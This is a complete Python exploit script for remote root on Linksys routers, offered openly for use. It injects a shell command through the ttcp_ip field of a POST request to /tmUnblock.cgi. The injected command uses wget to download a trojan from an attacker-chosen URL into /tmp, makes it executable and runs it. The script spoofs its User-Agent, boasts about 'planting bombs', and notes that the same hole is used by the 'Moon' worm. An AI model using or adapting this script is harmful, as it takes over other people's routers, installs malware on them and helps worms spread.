#!/usr/bin/python2 """ Linksys Remote Root Exploit infodox - insecurety research This is the exploit this "Moon" worm uses. Trivial blind cmd injection :) This version crippled - uses wget. Twitter: @info_dox Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku """ import requests import sys def banner(): print """\x1b[0;32m .____ .__ __ | | |__| ____ | | __ _________.__. ______ | | | |/ \| |/ / / ___< | |/ ___/ | |___| | | \ < \___ \ \___ |\___ \ |_______ \__|___| /__|_ \/____ >/ ____/____ > \/ \/ \/ \/ \/ \/ You are the weakest link. Goodbye. Linksys remote root - infodox - Insecurety Research. Version 2: Crippled (wget shelldrop only) \x1b[0m""" def upShell(wget_url, target): """ This works with the normal busybox wget at least, and worked in testing""" cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" %(wget_url) print "{+} Planting Bomb!" execute_command(target=target, command=cmd) print "{!} TERRORISTS WIN!" def execute_command(target, command): url = target + "/tmUnblock.cgi" injection = "-h `%s`" %(command) # this is a very sexy POST request. TOTALLY LEGIT. the_ownage = {'submit_button': '', 'change_action': '', 'action': '', 'commit': '0', 'ttcp_num': '2', 'ttcp_size': '2', 'ttcp_ip': injection, 'StartEPI': '1'} headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'} # it is truly mad hax. mad_hax = requests.post(url=url, data=the_ownage, headers=headers) def main(args): banner() if len(sys.argv) != 3: sys.exit("usage: %s http://target http://me.com/trojan.bin" %(sys.argv[0])) upShell(wget_url=sys.argv[2], target=sys.argv[1]) if __name__ == "__main__": main(sys.argv)